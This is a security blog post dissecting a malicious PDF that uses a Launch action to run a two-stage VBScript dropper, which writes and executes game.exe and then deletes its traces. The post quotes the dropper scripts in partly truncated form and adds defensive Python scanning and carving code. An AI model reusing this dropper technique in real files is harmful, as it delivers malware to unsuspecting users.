
0day or not today: exploit in the wild

By Bin Liu | May 04, 2010

Although running an executable from within a PDF is not a new idea, researcher Didier Stevens recently presented a technique that makes it practical "in the real world": a PDF Launch action, which needs no exploit against the reader, only a single click on the dialog it raises.

In this post I dissect a PDF document using this trick (MD5: 1dcd4a3f5d05433fcebf88d9138a1966) that was indeed found in the wild. Adobe, one of the affected vendors, is investigating the issue and has offered a temporary workaround (disabling "Allow opening of non-PDF file attachments with external applications" under Edit > Preferences > Trust Manager), but no patch is available yet. In fact there may never be one: although CVE-2010-1240 has been assigned to the issue, some argue that it is not a vulnerability at all, since it requires user interaction.

0day or not, vulnerability or not, it is a threat either way, and Fortinet provides protection against it: "PDF/Pidief.BV!exploit" in AV and "PDF.With.Launch.Action" in IPS, each tackling the threat from a different angle for better resistance to variants. Since no patch is available from Adobe or the other affected vendors, it is also important to recognise the form this trick takes in the wild.

The source of the malicious PDF document looks like the following:

[image: PDF source]

This is what you see when opening the PDF with the latest Adobe Reader (9.3.2):

[image: PDF look]

When you click the "Open" button, the following command line (the /P parameter string of the Launch action) is executed:

    /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject") > script.vbs [...Truncated...] && script.vbs && batscript.vbs)
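The IPS angle mentioned above is to recognise the Launch action itself rather than any particular command. The following scanner, added here as an example and not code from the original post or from Fortinet, finds every /Launch action in a PDF and pulls out its /F (program), /D (directory) and /P (parameters) entries, including actions stored inside FlateDecode-compressed streams that a raw search for "/Launch" would miss. The two sample PDFs inside it are constructed for this example and only model the structure of the document analysed here; they are not real samples.

```python
"""Find PDF /Launch actions and report the command line they would run."""
import re
import zlib

# Constructed sample, not a real malicious file: an /OpenAction whose Launch
# action hands cmd.exe a command line shaped like the one in the post. Inside
# a PDF literal string, balanced parentheses need no escaping; backslashes do.
SAMPLE_PDF = (
    b"%PDF-1.1\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n"
    b"3 0 obj\n<< /Type /Action /S /Launch /Win << /F (cmd.exe) "
    b"/D (c:\\\\windows\\\\system32) "
    b'/P (/c echo Set fso=CreateObject("Scripting.FileSystemObject") > script.vbs '
    b"&& script.vbs && batscript.vbs) >> >>\nendobj\n"
    b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
)

# Constructed sample: the same kind of action inside a FlateDecode object
# stream, which a plain search of the raw file for "/Launch" would miss.
_HIDDEN = zlib.compress(
    b"3 0 << /Type /Action /S /Launch /Win << /F (cmd.exe) /P (/c calc.exe) >> >>")
SAMPLE_COMPRESSED_PDF = (
    b"%PDF-1.5\n4 0 obj\n<< /Type /ObjStm /N 1 /First 4 /Filter /FlateDecode /Length "
    + str(len(_HIDDEN)).encode() + b" >>\nstream\n" + _HIDDEN + b"\nendstream\nendobj\n%%EOF\n"
)

_ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f"}


def literal_string(data, start):
    """Decode the PDF literal string opening at data[start] == b'('.
    Returns (decoded bytes, index just past the closing paren). Nested balanced
    parentheses, backslash escapes, octal escapes and backslash-newline
    continuations follow ISO 32000-1 section 7.3.4.2."""
    out, depth, i = bytearray(), 1, start + 1
    while i < len(data) and depth:
        c = data[i:i + 1]
        if c == b"\\":
            octal = re.match(rb"\\([0-7]{1,3})", data[i:i + 4])
            nxt = data[i + 1:i + 2]
            if octal:
                out.append(int(octal.group(1), 8) & 0xFF)
                i += 1 + len(octal.group(1))
            elif nxt in (b"\r", b"\n"):          # line continuation: dropped
                i += 2 + (nxt == b"\r" and data[i + 2:i + 3] == b"\n")
            else:                                 # \( \) \\ and friends
                out += _ESCAPES.get(nxt, nxt)
                i += 2
        else:
            depth += (c == b"(") - (c == b")")
            if depth:
                out += c
            i += 1
    return bytes(out), i


def hex_string(data, start):
    """Decode the PDF hex string <...> opening at data[start]; odd length pads with 0."""
    end = data.find(b">", start)
    digits = re.sub(rb"\s", b"", data[start + 1:end])
    return bytes.fromhex((digits + b"0" if len(digits) % 2 else digits).decode()), end + 1


def launch_actions(data, source="raw"):
    """One dict per /Launch action in data (streams are not inflated here)."""
    found, seen = [], set()
    for m in re.finditer(rb"/Launch(?![A-Za-z])", data):
        # Bound the search to the enclosing object: dictionary key order is not
        # fixed, so /F may sit before or after /S /Launch.
        begin = max(0, data.rfind(b" obj", 0, m.start()))
        end = data.find(b"endobj", m.start())
        end = len(data) if end < 0 else end
        if (begin, end) in seen:
            continue
        seen.add((begin, end))
        action = {"source": source, "offset": m.start()}
        for key in re.finditer(rb"/([FDP])(?![A-Za-z])\s*(?=[(<])", data[begin:end]):
            pos = begin + key.end()
            if data[pos:pos + 2] == b"<<":   # /F << ... >> file spec: its inner /F matches later
                continue
            value, _ = literal_string(data, pos) if data[pos:pos + 1] == b"(" else hex_string(data, pos)
            action[key.group(1).decode()] = value.decode("latin-1")
        found.append(action)
    return found


def scan_pdf(data):
    """Scan the raw bytes plus every FlateDecode stream that inflates."""
    results = launch_actions(data)
    for s in re.finditer(rb"/FlateDecode[^>]*>>\s*stream\r?\n(.*?)endstream", data, re.S):
        try:
            inflated = zlib.decompressobj().decompress(s.group(1))
        except zlib.error:
            continue   # corrupt stream: a real triage tool would flag it
        results += launch_actions(inflated, source="inflated stream @%d" % s.start(1))
    return results


if __name__ == "__main__":
    for sample in (SAMPLE_PDF, SAMPLE_COMPRESSED_PDF):
        for action in scan_pdf(sample):
            print(action)
```

Running the file prints one dictionary per action, with the command line under "P". The object-window heuristic (from the preceding " obj" to the next "endobj") is deliberately simple: actions whose /Win dictionary is an indirect reference, or strings that themselves contain "/F (", need a real object parser.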

This drops, populates and executes a VBScript called script.vbs, whose final contents are the following:

    Set fso=CreateObject("Scripting.FileSystemObject")
    ' read the PDF itself: it has to be sitting in the current directory as doc.pdf
    Set f=fso.OpenTextFile("doc.pdf", 1, True)
    pf=f.ReadAll
    ' cut out the text between the 'SS and 'EE markers
    s=InStr(pf,"'SS")
    e=InStr(pf,"'EE")
    s=Mid(pf,s,e-s)
    ' strip the '%' filler characters and write the result out as batscript.vbs
    Set z=fso.OpenTextFile("batscript.vbs", 2, True)
    s = Replace(s,"%","")
    z.Write(s)

It merely extracts a second script, batscript.vbs, embedded in the PDF document between the 'SS and 'EE markers (removing every '%' character on the way) and drops it in the current directory. batscript.vbs contains the following:

    Dim b
    Function c(d)
    c=chr(d)
    End Function
    ' the executable, one byte per element: c(077)=M, c(090)=Z, the MZ header
    b=Array(c(077),c(090),c(144),[Truncated]
    Set fso = CreateObject("Scripting.FileSystemObject")
    ' write all 35329 bytes to game.exe
    Set f = fso.OpenTextFile("game.exe", 2, True)
    For i = 0 To 35328
    f.write(b(i))
    Next
    f.close()
    ' run it, wait three seconds, then remove the binary and both scripts
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.Run "cmd.exe /c game.exe"
    WScript.Sleep 3000
    Set f = FSO.GetFile("game.exe")
    f.Delete
    Set f = FSO.GetFile("batscript.vbs")
    f.Delete
    Set f = FSO.GetFile("script.vbs")
    f.Delete

This rebuilds a binary, game.exe, from an array of byte values (each element a chr() call), runs it, and then deletes game.exe and both scripts to cover its tracks. game.exe in turn downloads and installs an instance of the infamous Zeus bot, whose main purpose is to steal banking credentials and account information, including by intercepting live sessions.
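Read-only carving of the staged payload, added here as an example (not code from the original post or from Fortinet): it repeats what script.vbs and batscript.vbs do, but in memory, so an analyst can recover the dropped executable and its hash from a sample without running anything. The marker names, the '%' filler and the c(NNN) array format are taken from the scripts quoted above; the sample blob is constructed, with an 8-byte fake MZ file standing in for the 35329-byte game.exe.

```python
"""Carve the staged payload out of a PDF carrying the post's two-stage VBScript dropper."""
import hashlib
import re

# Constructed sample blob, not the real document: a few lines of stage-2 script
# between the 'SS and 'EE markers with '%' filler sprinkled in, wrapping an
# 8-byte fake MZ file (the real array held 35329 elements, loop bound 35328).
SAMPLE_PDF = (
    b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
    b"%'SS\n"
    b"Dim b\nFunction c(d)\nc=chr(d)\nEnd Function\n"
    b"b=Ar%ray(c(077),c(090),c(1%44),c(000),c(0%03),c(000),c(255),c(255))\n"
    b'Set fso = Crea%teObject("Scripting.FileSystemObject")\n'
    b'Set f = fso.OpenTextFile("game.exe", 2, True)\n'
    b"For i = 0 To 7\nf.write(b(i))\nNext\nf.close()\n"
    b"'EE\n%%EOF\n"
)


def extract_stage2(pdf):
    """Stage 1, as script.vbs does it: the text from 'SS up to 'EE with every
    '%' deleted (InStr / Mid / Replace in the original)."""
    s, e = pdf.find(b"'SS"), pdf.find(b"'EE")
    if s < 0 or e <= s:
        raise ValueError("'SS/'EE markers not found")
    return pdf[s:e].replace(b"%", b"")


def carve_payload(stage2):
    """Stage 2, as batscript.vbs does it, but into memory instead of game.exe:
    rebuild the file from the c(NNN) array and cross-check it against the script.
    Each value is taken as a raw byte; on the victim the bytes go through Chr()
    and an ANSI text stream, a round trip the dropper relies on being the identity."""
    start = stage2.find(b"Array(")
    if start < 0:
        raise ValueError("no Array(...) literal in stage 2")
    # Walk to the parenthesis that closes Array(...); the elements are c(...) calls.
    i, depth = start + len(b"Array("), 1
    while depth and i < len(stage2):
        depth += (stage2[i:i + 1] == b"(") - (stage2[i:i + 1] == b")")
        i += 1
    if depth:
        raise ValueError("Array(...) literal is truncated")
    body = stage2[start + len(b"Array("):i - 1]
    # VBScript has no octal literals, so c(077) is decimal 77 ('M'); int(b"077") agrees.
    values = [int(v) for v in re.findall(rb"c\((\d+)\)", body)]
    bad = [v for v in values if v > 255]
    if bad:
        raise ValueError("element values above 255: %r" % bad[:5])
    payload = bytes(values)
    # Cross-check against the For loop bound and the file name the script writes to.
    loop = re.search(rb"For\s+i\s*=\s*0\s+To\s+(\d+)", stage2)
    drop = re.search(rb'OpenTextFile\("([^"]+)",\s*2', stage2)
    return {
        "bytes": payload,
        "size": len(payload),
        "loop_writes": int(loop.group(1)) + 1 if loop else None,
        "drops": drop.group(1).decode() if drop else None,
        "is_mz": payload[:2] == b"MZ",
        "sha256": hashlib.sha256(payload).hexdigest(),
    }


if __name__ == "__main__":
    info = carve_payload(extract_stage2(SAMPLE_PDF))
    print({k: v for k, v in info.items() if k != "bytes"})
```

A mismatch between "size" and "loop_writes", or a missing MZ header, means the array was edited or truncated in transit and the carved file is not what the victim would have executed; the hash is what you would submit to your AV vendor or compare against detections such as the ones listed at the end of the post.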

All that from a single user click. So if you run into such a dialog when opening a PDF document, consider that something may be rotten in the Kingdom of Denmark (or at least in that document), and do not be too quick to click "Open".

Fortinet detects game.exe as W32/Agent.DJBN!tr and the Zeus bot instance as W32/Zbot.AISS!tr. A detailed analysis of the Zeus botnet is available on the FortiGuard Center.

Guillaume Lovet contributed to this post.
